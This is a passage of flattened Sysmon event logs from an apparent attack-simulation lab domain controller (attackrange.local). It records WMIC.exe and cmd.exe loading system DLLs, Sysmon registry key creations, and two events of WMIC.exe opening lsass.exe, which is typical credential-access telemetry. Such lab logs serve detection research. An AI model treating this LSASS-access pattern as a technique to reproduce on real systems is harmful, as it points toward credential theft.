CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x800000000000000057349721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057349720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wininet.dll11.00.14393.4583 (rs1_release.210730-1850)Internet Extensions for Win32Internet ExplorerMicrosoft Corporationwininet.dllMD5=524876363DA8F469C13E0818256B6131,SHA256=DAA85FEAB4553D9A203A85A58C8CB26A2784E0D33226B41AAE98471DAE75C035trueMicrosoft WindowsValid 734700x800000000000000057349719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 12241200x800000000000000057349718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 734700x800000000000000057349715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 12241200x800000000000000057349714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 12241200x800000000000000057349704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057349697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 12241200x800000000000000057349696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\System32\cmd.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 12241200x800000000000000057349693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057349691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 12241200x800000000000000057349690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057349688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057349687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057349686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057349685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057349684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057349683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057349682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057349681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msxml3.dll8.110.14393.4467MSXML 3.0Microsoft XML Core ServicesMicrosoft CorporationMSXML3.dllMD5=6814685E95C03FBB44F443A2E382A0BC,SHA256=01FE087FEC5C44D5DC17875038BEDCC47544F710DEB83D421A7D6DF05DA688CFtrueMicrosoft WindowsValid 734700x800000000000000057349680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057349679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 10341000x800000000000000057349678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-886B-6164-0B00-00000000F101}6486932C:\Windows\system32\lsass.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057349676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Wbem\CIMOM 12241200x800000000000000057349675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeHKLM\SOFTWARE\Microsoft\Wbem\CIMOM 734700x800000000000000057349674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057349673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbemcomn.dll10.0.14393.4530 (rs1_release.210705-0736)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=91E2160941219FFEBE4093E6681BE4CF,SHA256=3B8AA86EAF2200F53A6EB57B08A34F1BA5E467B72E5002C3BCBF20AF40D98CD1trueMicrosoft WindowsValid 734700x800000000000000057349672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057349671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3trueMicrosoft WindowsValid 12241200x800000000000000057349670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.690{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 12241200x800000000000000057349659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.674{8B6011A9-5BAC-618E-60F3-04000000F101}360C:\Windows\System32\cmd.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 12241200x800000000000000057349653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.674{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 